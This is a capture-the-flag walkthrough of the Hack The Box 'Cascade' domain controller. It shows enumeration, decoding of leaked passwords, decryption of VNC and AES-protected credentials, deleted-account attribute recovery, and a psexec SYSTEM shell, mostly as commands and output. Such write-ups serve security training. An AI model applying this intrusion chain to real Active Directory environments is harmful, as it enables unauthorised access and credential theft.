Enumeration

Let's start!

First let's create a directory for this box.

mkdir ~/hackthebox/cascade
cd ~/hackthebox/cascade

Now, to find out what's going on in the box, let's run nmap.

nmap -A 10.10.10.182 -o nmap

# Nmap 7.80 scan initiated Sun Mar 29 21:47:34 2020 as: nmap -A -o nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.19s latency).
Not shown: 987 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-29 16:02:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -26s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-29T16:03:43
|_  start_date: 2020-03-29T15:28:10

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   186.64 ms 10.10.14.1
2   186.82 ms 10.10.10.182

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 29 21:51:46 2020 -- 1 IP address (1 host up) scanned in 251.67 seconds

Now, as with most Windows boxes, I like to run enum4linux. Let's see if it gives us something.

enum4linux -a 10.10.10.182 | tee enum4linux

So, we got a list of users, let's extract it.

cat enum4linux | grep "Account: " | awk '{print $8}' | tee users.txt

a.turnbull
arksvc
b.hanson
BackupSvc
CascGuest
d.burman
e.crowe
i.croft
j.allen
j.goodhand
j.wakefield
r.thompson
s.hickson
s.smith
util

Let's add the domain name in our /etc/hosts file.

vi /etc/hosts

10.10.10.182	cascade.local

Let's try ldapsearch as well.

ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" | tee ldapsearch       

Wow, that's a lot of data.

Takeaway:
(For user r.thompson)
cascadeLegacyPwd: clk0bjVldmE=

operatingSystem: Windows Server 2008 R2 Standard
operatingSystemVersion: 6.1 (7601)
operatingSystemServicePack: Service Pack 1

Interesting, now we have a base64 string, let's decode it.

root@kali:~/hackthebox/cascade# echo "clk0bjVldmE=" | base64 -d
rY4n5eva

Now, let's try these creds with crackmapexec.

root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\r.thompson:rY4n5eva 
[*] KTHXBYE!

Nice. Now, let's try to list shares.

root@kali:~/hackthebox/cascade# crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\r.thompson:rY4n5eva 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!

User

So, we have read permissions in some of the stares. Now, let's try to access them!

root@kali:~/hackthebox/cascade# smbclient -U r.thompson \\\\10.10.10.182\\Data
Enter WORKGROUP\r.thompson's password: 
smb: \> ls
smb: \> recurse on
smb: \> ls

You should see that there is Meeting_Notes_June_2018.html file in Email archives. It looks interesting. Let's see what it is.

We see that the email mentions the username, TempAdmin and the password to be the "normal admin account password". Interesting.
You should find another file, VNC install.reg
If you download that file and cat it, you should see a hex password.

cat VNC\ Install.reg

	"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

Searching for VNC password decoder, you should find this Github repo:
https://github.com/trinitronx/vncpasswd.py

root@kali:~/hackthebox/cascade# git clone https://github.com/trinitronx/vncpasswd.py.git vncpasswd.py
cd vncpasswd.py
root@kali:~/hackthebox/cascade# ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'

Now, we have Steve's password.
Let's try to login using evil-winrm.

./evil-winrm.rb -i 10.10.10.182 -u s.smith -p sT333ve2

Nice, we are in.

User 2

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Now, let's get winPEAS.

*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /root/hackthebox/remote/winPEAS.exe .

Run winPEAS.exe

.\winPEAS.exe

  [+] Looking for AutoLogon credentials(T1012)                                       
    Some AutoLogon credentials were found!!                                          
    DefaultDomainName             :  CASCADE                                         
    DefaultUserName               :  vbscrub  
    
  [+] Unnattend Files()
    C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password>     <Enabled>true</Enabled>      <Username>vbscrub</Username>     </AutoLogon>    <UserAccounts>     <LocalAccounts>      <LocalAccount wcm:action="add">      
 <Password>*SENSITIVE*DATA*DELETED*</Password>

Now, let's see if we can do somethings with these credentials that we couldn't do earlier.

root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\s.smith:sT333ve2 
[*] KTHXBYE!


root@kali:~/Desktop# crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\s.smith:sT333ve2 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          READ
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!

Now, let's enumerate those shares.

Let's check the Audit$ share.

smbclient -U s.smith \\\\10.10.10.182\\Audit$

smb: \> ls
smb: \> recurse on
smb: \> ls

We see a few interesting files here. The Audit.db, CascAudit.exe and RunAudit.bat.
Let's download all of those.

smb: \> get CascAudit.exe 
smb: \> get RunAudit.bat
smb: \> get DB\Audit.db

Now, in our Kali machine, let's see what's in the bat file.

cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

Hmm, seems like, its running the exe and sending the Audit.db file as a parameter to it.

If we check the Audit.db file, we should see that its a database file, and has a password column as well. However, the password seems to be base64 encoded and just decoding it gives us something weird.
So, maybe it is running the CascAudit.exe file to encrypt the password.
Seems like we will need to get the CascCrypto.dll file as well.

smb: \> get CascCrypto.dll

So, its Reverse Engineering. I haven't done much of it, and just thinking of it I'm kinda getting pissed.

Download the decomplier from here:
https://github.com/icsharpcode/AvaloniaILSpy

mkdir /tools/ILSpy/
mv ILSpy-linux-x64-Release.zip /tools/ILSpy/
cd /tools/ILSpy/
unzip ILSpy-linux-x64-Release.zip 
chmod a+x ILSpy
./ILSpy

Selecting the dll file, we see that, it seems to be using AES crypto.

	public static string DecryptString(string EncryptedString, string Key)
	{
	//Discarded unreachable code: IL_009e
	
	byte[] array = Convert.FromBase64String(EncryptedString);
	Aes aes = Aes.Create();
	aes.KeySize = 128;
	aes.BlockSize = 128;
	aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
	aes.Mode = CipherMode.CBC;
	aes.Key = Encoding.UTF8.GetBytes(Key);
	using (MemoryStream stream = new MemoryStream(array)){
		using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
		{
			byte[] array2 = new byte[checked(array.Length - 1 + 1)];
			cryptoStream.Read(array2, 0, array2.Length);
			return Encoding.UTF8.GetString(array2);
		
		}
	}

Here, we have the IV.
Now, it seems like we need to reverse engineer the exe file to get the key. Yikes.
Select the exe file.

Going through it, we find the key.

Type: AES
Key: c4scadek3y654321
IV: 1tdyjCbY1Ix49842

Using CyberChef to decode it we get the password: w3lc0meFr31nd
Phew.

Screen Shot 2020-04-06 at 7.38.07 PM.png

https://gchq.github.io/CyberChef/

This is the password for the user, ArkSvc.

./evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd

Administrator

Damn, this has been one hell of a journey so far. Tough box.

Now, let's just recall the things that we know.

  • We know that they use a new account called TempAdmin.
  • We know that its password is the same as the normal account.

Following the pattern with this box, let's list the smb shares available to this account!

root@kali:~# crackmapexec smb 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd --shares
CME          10.10.10.182:445 CASC-DC1        [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:CASCADE)
CME          10.10.10.182:445 CASC-DC1        [+] CASCADE\ArkSvc:w3lc0meFr31nd 
CME          10.10.10.182:445 CASC-DC1        [+] Enumerating shares
CME          10.10.10.182:445 CASC-DC1        SHARE           Permissions
CME          10.10.10.182:445 CASC-DC1        -----           -----------
CME          10.10.10.182:445 CASC-DC1        ADMIN$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        IPC$            NO ACCESS
CME          10.10.10.182:445 CASC-DC1        SYSVOL          READ
CME          10.10.10.182:445 CASC-DC1        Audit$          NO ACCESS
CME          10.10.10.182:445 CASC-DC1        C$              NO ACCESS
CME          10.10.10.182:445 CASC-DC1        print$          READ
CME          10.10.10.182:445 CASC-DC1        NETLOGON        READ
CME          10.10.10.182:445 CASC-DC1        Data            READ
[*] KTHXBYE!
root@kali:~# smbclient -U ArkSvc \\\\10.10.10.182\\Data
Enter WORKGROUP\ArkSvc's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 09:12:34 2020
  ..                                  D        0  Mon Jan 27 09:12:34 2020
  Contractors                         D        0  Mon Jan 13 07:30:11 2020
  Finance                             D        0  Mon Jan 13 07:30:06 2020
  IT                                  D        0  Tue Jan 28 23:49:51 2020
  Production                          D        0  Mon Jan 13 07:30:18 2020
  Temps                               D        0  Mon Jan 13 07:30:15 2020

                13106687 blocks of size 4096. 7793454 blocks available
smb: \> recurse on

Doing another ls you should see there is a Recycle Bin log file.

smb: \> get IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \> 

If we read the file, we can see the we have permission to work with the Recycle Bin. Also, it seems that the TempAdmin user has been recently deleted. Weird.

Now, let's try to restore the user.

https://docs.microsoft.com/en-us/powershell/module/addsadministration/restore-adobject?view=win10-ps

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

Now, let's try to restore the user.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject                                                                   
Insufficient access rights to perform the operation                                                                                                                                                          
At line:1 char:80                                                                                                                                                                                            
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject                                                                                                                                  
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Wait what? Insufficient access rights? Really?
But, still, let's check the properties of the user.

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects -Properties *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

Wow, okay we see cascadeLegacyPwd. That's how we got the password of our first user. Let's base64 decode it.

root@kali:~/Desktop# echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles

Now, as mentioned earlier, the password of TempAdmin is the same as that of normal Administrator. Let's try to get a shell.
Let's use psexec.py this time!

root@kali:/usr/share/doc/python3-impacket/examples# ./psexec.py cascade.local/Administrator:"baCT3r1aN00dles"@10.10.10.182
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file MelpKkvH.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service tCEG on 10.10.10.182.....
[*] Starting service tCEG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Nice. That's all.
Congratulations! That's one hell of a box!